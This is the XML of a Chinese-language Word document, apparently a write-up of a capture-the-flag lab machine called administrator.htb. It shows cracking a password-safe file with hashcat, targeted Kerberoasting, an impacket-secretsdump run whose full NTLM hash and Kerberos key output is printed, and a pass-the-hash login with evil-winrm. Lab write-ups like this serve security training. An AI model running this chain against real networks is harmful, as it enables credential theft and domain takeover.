          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251671552" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7A069B09" wp14:editId="6A769DAE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2344420"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapTight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ight>
            <wp:docPr id="130364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4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01E2F" w14:textId="42518C39" w:rsidR="00BB1BF8" w:rsidRDefault="00AF13C6">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现需要密码使用hashcat来爆破</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9A835D" w14:textId="7A88CCD4" w:rsidR="00AF13C6" w:rsidRDefault="008E1144">
      <w:r w:rsidRPr="008E1144">
        <w:t>hashhashcat Backup.psafe3  /usr/share/wordlists/rockyou.txt -m 5200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B58EB7" w14:textId="04D7A0DF" w:rsidR="00AF13C6" w:rsidRDefault="008E1144">
      <w:r w:rsidRPr="008E1144">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251673600" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5F434B26" wp14:editId="33A6DD3A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706755"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20960"/>
                <wp:lineTo x="21532" y="20960"/>
                <wp:lineTo x="21532" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="656304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04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587FA" w14:textId="1AACCB1D" w:rsidR="00AF13C6" w:rsidRDefault="008E1144">
      <w:r w:rsidRPr="008E1144">
        <w:t xml:space="preserve">Backup.psafe3:tekieromucho   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A65876" w14:textId="3B9608D1" w:rsidR="00AF13C6" w:rsidRDefault="008E1144">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>得到了主密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CD8330" w14:textId="4803FB34" w:rsidR="00AF13C6" w:rsidRDefault="000C7F24">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进去得到了三组账密</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7851B1CE" w14:textId="206978D8" w:rsidR="00AF13C6" w:rsidRDefault="00507220">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>mily</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00507220">
        <w:t xml:space="preserve"> UXLCI5iETUsIBoFVTj8yQFKoHjXmb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547626F7" w14:textId="358F26AB" w:rsidR="00AF13C6" w:rsidRDefault="00507220">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>emma:</w:t>
      </w:r>
      <w:r w:rsidRPr="00507220">
        <w:t xml:space="preserve"> WwANQWnmJnGV07WQN8bMS7FMAbjNur</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320C26B0" w14:textId="12931AED" w:rsidR="005A1EEF" w:rsidRDefault="00507220">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>alexander:</w:t>
      </w:r>
      <w:r w:rsidRPr="00507220">
        <w:t xml:space="preserve"> UrkIbagoxMyUGw0aPlj9B0AXSea4Sw</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650B7668" w14:textId="012BD874" w:rsidR="005A1EEF" w:rsidRDefault="00F55E09">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用emily即可进入winrm拿到第一个flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07634CA6" w14:textId="77777777" w:rsidR="005A1EEF" w:rsidRDefault="005A1EEF"/>
    <w:p w14:paraId="599695C5" w14:textId="7EC401FB" w:rsidR="005A1EEF" w:rsidRDefault="004E57AB">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接下来是提权</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7383342E" w14:textId="7482BA54" w:rsidR="005A1EEF" w:rsidRDefault="004E57AB">
      <w:r w:rsidRPr="004E57AB">
        <w:t>targetedKerberoast.py -v -d '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>administrator.htb</w:t>
      </w:r>
      <w:r w:rsidRPr="004E57AB">
        <w:t>' -u '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>emily</w:t>
      </w:r>
      <w:r w:rsidRPr="004E57AB">
        <w:t>' -p ''</w:t>
      </w:r>
      <w:r w:rsidR="0033151C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将密码写进去</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0149A837" w14:textId="6283AF6D" w:rsidR="0033151C" w:rsidRDefault="0033151C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得到很长的krb5的内容继续使用hashcat爆破</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8DE5BE" w14:textId="5CF376AB" w:rsidR="0033151C" w:rsidRDefault="0033151C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0033151C">
        <w:t>limpbizkit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408FB762" w14:textId="77777777" w:rsidR="005A1EEF" w:rsidRDefault="005A1EEF"/>
    <w:p w14:paraId="5DFBD982" w14:textId="29705B8E" w:rsidR="005A1EEF" w:rsidRDefault="00AD027E">
      <w:r w:rsidRPr="00AD027E">
        <w:t>impacket-secretsdump ethan:limpbizkit@10.10.11.42</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6328024E" w14:textId="60E5EDBE" w:rsidR="005A1EEF" w:rsidRDefault="00800B52">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以得到NTLM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1086A2A4" w14:textId="77777777" w:rsidR="001A3784" w:rsidRDefault="001A3784" w:rsidP="001A3784">
      <w:r>
        <w:t>Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181A1B96" w14:textId="77777777" w:rsidR="001A3784" w:rsidRDefault="001A3784" w:rsidP="001A3784">
      <w:r>
        <w:t>Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA11133" w14:textId="77777777" w:rsidR="001A3784" w:rsidRDefault="001A3784" w:rsidP="001A3784">
      <w:r>
        <w:t>krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1DA4DA" w14:textId="77777777" w:rsidR="001A3784" w:rsidRDefault="001A3784" w:rsidP="001A3784">
      <w:r>
        <w:t>administrator.htb\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E49F213" w14:textId="77777777" w:rsidR="001A3784" w:rsidRDefault="001A3784" w:rsidP="001A3784">
      <w:r>
        <w:t>administrator.htb\michael:1109:aad3b435b51404eeaad3b435b51404ee:cb8a428385459087a76793010d60f5dc:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D88330" w14:textId="77777777" w:rsidR="001A3784" w:rsidRDefault="001A3784" w:rsidP="001A3784">
      <w:r>
        <w:t>administrator.htb\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:cb8a428385459087a76793010d60f5dc:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2DC2CC" w14:textId="77777777" w:rsidR="001A3784" w:rsidRDefault="001A3784" w:rsidP="001A3784">
      <w:r>
        <w:t>administrator.htb\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C96D756" w14:textId="77777777" w:rsidR="001A3784" w:rsidRDefault="001A3784" w:rsidP="001A3784">
      <w:r>
        <w:t>administrator.htb\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CFE62B" w14:textId="77777777" w:rsidR="001A3784" w:rsidRDefault="001A3784" w:rsidP="001A3784">
      <w:r>
        <w:t>administrator.htb\alexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBDD710" w14:textId="77777777" w:rsidR="001A3784" w:rsidRDefault="001A3784" w:rsidP="001A3784">
      <w:r>
        <w:t>administrator.htb\emma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F059AE" w14:textId="77777777" w:rsidR="001A3784" w:rsidRDefault="001A3784" w:rsidP="001A3784">
      <w:r>
        <w:t>DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAD2C05" w14:textId="77777777" w:rsidR="001A3784" w:rsidRDefault="001A3784" w:rsidP="001A3784">
      <w:r>
        <w:t>[*] Kerberos keys grabbed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617EA46A" w14:textId="77777777" w:rsidR="001A3784" w:rsidRDefault="001A3784" w:rsidP="001A3784">
      <w:r>
        <w:t>Administrator:aes256-cts-hmac-sha1-96:9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5276663A" w14:textId="77777777" w:rsidR="001A3784" w:rsidRDefault="001A3784" w:rsidP="001A3784">
      <w:r>
        <w:t>Administrator:aes128-cts-hmac-sha1-96:08b0633a8dd5f1d6cbea29014caea5a2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233C923E" w14:textId="77777777" w:rsidR="001A3784" w:rsidRDefault="001A3784" w:rsidP="001A3784">
      <w:r>
        <w:t>Administrator:des-cbc-md5:403286f7cdf18385</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C31FD3" w14:textId="77777777" w:rsidR="001A3784" w:rsidRDefault="001A3784" w:rsidP="001A3784">
      <w:r>
        <w:t>krbtgt:aes256-cts-hmac-sha1-96:920ce354811a517c703a217ddca0175411d4a3c0880c359b2fdc1a494fb13648</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A8D08D" w14:textId="77777777" w:rsidR="001A3784" w:rsidRDefault="001A3784" w:rsidP="001A3784">
      <w:r>
        <w:t>krbtgt:aes128-cts-hmac-sha1-96:aadb89e07c87bcaf9c540940fab4af94</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C555E1B" w14:textId="77777777" w:rsidR="001A3784" w:rsidRDefault="001A3784" w:rsidP="001A3784">
      <w:r>
        <w:t>krbtgt:des-cbc-md5:2c0bc7d0250dbfc7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62080414" w14:textId="77777777" w:rsidR="001A3784" w:rsidRDefault="001A3784" w:rsidP="001A3784">
      <w:r>
        <w:t>administrator.htb\olivia:aes256-cts-hmac-sha1-96:713f215fa5cc408ee5ba000e178f9d8ac220d68d294b077cb03aecc5f4c4e4f3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68915E09" w14:textId="77777777" w:rsidR="001A3784" w:rsidRDefault="001A3784" w:rsidP="001A3784">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>administrator.htb\olivia:aes128-cts-hmac-sha1-96:3d15ec169119d785a0ca2997f5d2aa48</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD17941" w14:textId="77777777" w:rsidR="001A3784" w:rsidRDefault="001A3784" w:rsidP="001A3784">
      <w:r>
        <w:t>administrator.htb\olivia:des-cbc-md5:bc2a4a7929c198e9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E25815E" w14:textId="77777777" w:rsidR="001A3784" w:rsidRDefault="001A3784" w:rsidP="001A3784">
      <w:r>
        <w:t>administrator.htb\michael:aes256-cts-hmac-sha1-96:96eea497fb09ac07215a2d847205a7e9594f7627316e068f4a37d67ede461a89</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE0A2F4" w14:textId="77777777" w:rsidR="001A3784" w:rsidRDefault="001A3784" w:rsidP="001A3784">
      <w:r>
        <w:t>administrator.htb\michael:aes128-cts-hmac-sha1-96:686b6a64b141b7ab0d1072a71e160a3c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D84023" w14:textId="77777777" w:rsidR="001A3784" w:rsidRDefault="001A3784" w:rsidP="001A3784">
      <w:r>
        <w:t>administrator.htb\michael:des-cbc-md5:79d0f7675eb52ccb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E213BDC" w14:textId="77777777" w:rsidR="001A3784" w:rsidRDefault="001A3784" w:rsidP="001A3784">
      <w:r>
        <w:t>administrator.htb\benjamin:aes256-cts-hmac-sha1-96:3b1975a47ae9585c07141116a363f1a7eb683e82e561c23133daaaa8bfb01abc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0222CB" w14:textId="77777777" w:rsidR="001A3784" w:rsidRDefault="001A3784" w:rsidP="001A3784">
      <w:r>
        <w:t>administrator.htb\benjamin:aes128-cts-hmac-sha1-96:7e626bade59b8acf9a7568c002785671</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FD7E3D" w14:textId="77777777" w:rsidR="001A3784" w:rsidRDefault="001A3784" w:rsidP="001A3784">
      <w:r>
        <w:t>administrator.htb\benjamin:des-cbc-md5:2c4516c10e7a7902</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE0E8B6" w14:textId="77777777" w:rsidR="001A3784" w:rsidRDefault="001A3784" w:rsidP="001A3784">
      <w:r>
        <w:t>administrator.htb\emily:aes256-cts-hmac-sha1-96:53063129cd0e59d79b83025fbb4cf89b975a961f996c26cdedc8c6991e92b7c4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524C864D" w14:textId="77777777" w:rsidR="001A3784" w:rsidRDefault="001A3784" w:rsidP="001A3784">
      <w:r>
        <w:t>administrator.htb\emily:aes128-cts-hmac-sha1-96:fb2a594e5ff3a289fac7a27bbb328218</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC91F4C" w14:textId="77777777" w:rsidR="001A3784" w:rsidRDefault="001A3784" w:rsidP="001A3784">
      <w:r>
        <w:t>administrator.htb\emily:des-cbc-md5:804343fb6e0dbc51</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC292F5" w14:textId="77777777" w:rsidR="001A3784" w:rsidRDefault="001A3784" w:rsidP="001A3784">
      <w:r>
        <w:t>administrator.htb\ethan:aes256-cts-hmac-sha1-96:e8577755add681a799a8f9fbcddecc4c3a3296329512bdae2454b6641bd3270f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058C8D82" w14:textId="77777777" w:rsidR="001A3784" w:rsidRDefault="001A3784" w:rsidP="001A3784">
      <w:r>
        <w:t>administrator.htb\ethan:aes128-cts-hmac-sha1-96:e67d5744a884d8b137040d9ec3c6b49f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1D7928" w14:textId="77777777" w:rsidR="001A3784" w:rsidRDefault="001A3784" w:rsidP="001A3784">
      <w:r>
        <w:t>administrator.htb\ethan:des-cbc-md5:58387aef9d6754fb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BDF7EF" w14:textId="77777777" w:rsidR="001A3784" w:rsidRDefault="001A3784" w:rsidP="001A3784">
      <w:r>
        <w:t>administrator.htb\alexander:aes256-cts-hmac-sha1-96:b78d0aa466f36903311913f9caa7ef9cff55a2d9f450325b2fb390fbebdb50b6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDD3DCD" w14:textId="77777777" w:rsidR="001A3784" w:rsidRDefault="001A3784" w:rsidP="001A3784">
      <w:r>
        <w:t>administrator.htb\alexander:aes128-cts-hmac-sha1-96:ac291386e48626f32ecfb87871cdeade</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2598C13C" w14:textId="77777777" w:rsidR="001A3784" w:rsidRDefault="001A3784" w:rsidP="001A3784">
      <w:r>
        <w:t>administrator.htb\alexander:des-cbc-md5:49ba9dcb6d07d0bf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7039D384" w14:textId="77777777" w:rsidR="001A3784" w:rsidRDefault="001A3784" w:rsidP="001A3784">
      <w:r>
        <w:t>administrator.htb\emma:aes256-cts-hmac-sha1-96:951a211a757b8ea8f566e5f3a7b42122727d014cb13777c7784a7d605a89ff82</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75745C0C" w14:textId="77777777" w:rsidR="001A3784" w:rsidRDefault="001A3784" w:rsidP="001A3784">
      <w:r>
        <w:t>administrator.htb\emma:aes128-cts-hmac-sha1-96:aa24ed627234fb9c520240ceef84cd5e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFC242F" w14:textId="77777777" w:rsidR="001A3784" w:rsidRDefault="001A3784" w:rsidP="001A3784">
      <w:r>
        <w:t>administrator.htb\emma:des-cbc-md5:3249fba89813ef5d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6304E13C" w14:textId="77777777" w:rsidR="001A3784" w:rsidRDefault="001A3784" w:rsidP="001A3784">
      <w:r>
        <w:t>DC$:aes256-cts-hmac-sha1-96:98ef91c128122134296e67e713b233697cd313ae864b1f26ac1b8bc4ec1b4ccb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D41A38C" w14:textId="77777777" w:rsidR="001A3784" w:rsidRDefault="001A3784" w:rsidP="001A3784">
      <w:r>
        <w:t>DC$:aes128-cts-hmac-sha1-96:7068a4761df2f6c760ad9018c8bd206d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79886214" w14:textId="6A2C0926" w:rsidR="005A1EEF" w:rsidRDefault="001A3784" w:rsidP="001A3784">
      <w:r>
        <w:t>DC$:des-cbc-md5:f483547c4325492a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A26B86" w14:textId="62A2174B" w:rsidR="005A1EEF" w:rsidRDefault="00800B52">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00800B52">
        <w:t>evil-winrm -i administrator.htb -u administrator -H</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTLM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDAC0BD" w14:textId="1BED8482" w:rsidR="00800B52" w:rsidRDefault="00800B52">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即可登录域控</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A918A2" w14:textId="77777777" w:rsidR="005A1EEF" w:rsidRDefault="005A1EEF"/>
    <w:sectPr w:rsidR="005A1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D8C"/>
    <w:rsid w:val="000B0776"/>
    <w:rsid w:val="000C7F24"/>
    <w:rsid w:val="00114111"/>
    <w:rsid w:val="001600D3"/>
    <w:rsid w:val="001A3784"/>
    <w:rsid w:val="001C433B"/>
    <w:rsid w:val="0021745F"/>
    <w:rsid w:val="0022333D"/>
    <w:rsid w:val="0033151C"/>
    <w:rsid w:val="00365D06"/>
    <w:rsid w:val="003C5BD4"/>
    <w:rsid w:val="00407D8C"/>
    <w:rsid w:val="00440F53"/>
    <w:rsid w:val="004507CE"/>
    <w:rsid w:val="00473BF8"/>
    <w:rsid w:val="004D7346"/>
    <w:rsid w:val="004E57AB"/>
    <w:rsid w:val="00507220"/>
    <w:rsid w:val="005A1EEF"/>
    <w:rsid w:val="005A70BC"/>
    <w:rsid w:val="005F23F5"/>
    <w:rsid w:val="005F5CD1"/>
    <w:rsid w:val="00641C37"/>
    <w:rsid w:val="00690A1F"/>
    <w:rsid w:val="006A0D77"/>
    <w:rsid w:val="006D7A11"/>
    <w:rsid w:val="006F1947"/>
    <w:rsid w:val="00735D64"/>
    <w:rsid w:val="00800B52"/>
    <w:rsid w:val="008149CE"/>
    <w:rsid w:val="008E1144"/>
    <w:rsid w:val="008F5FCB"/>
    <w:rsid w:val="00906CE2"/>
    <w:rsid w:val="0092332B"/>
    <w:rsid w:val="00936296"/>
    <w:rsid w:val="00AA1DC1"/>
    <w:rsid w:val="00AD027E"/>
    <w:rsid w:val="00AF13C6"/>
    <w:rsid w:val="00BB1BF8"/>
    <w:rsid w:val="00BB6023"/>
    <w:rsid w:val="00D35A55"/>
    <w:rsid w:val="00E0560C"/>
    <w:rsid w:val="00E07D9F"/>
    <w:rsid w:val="00E24361"/>
    <w:rsid w:val="00E47AD0"/>
    <w:rsid w:val="00E82BF3"/>
    <w:rsid w:val="00F55E09"/>
    <w:rsid w:val="00F8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3944"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{D7DF9A06-A063-4B68-8834-080628A9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鱼香 张</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>鱼香 张</cp:lastModifiedBy>
  <cp:revision>66</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-01-05T01:54:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-01-05T05:10:00Z</dcterms:modified>
</cp:coreProperties>
</file>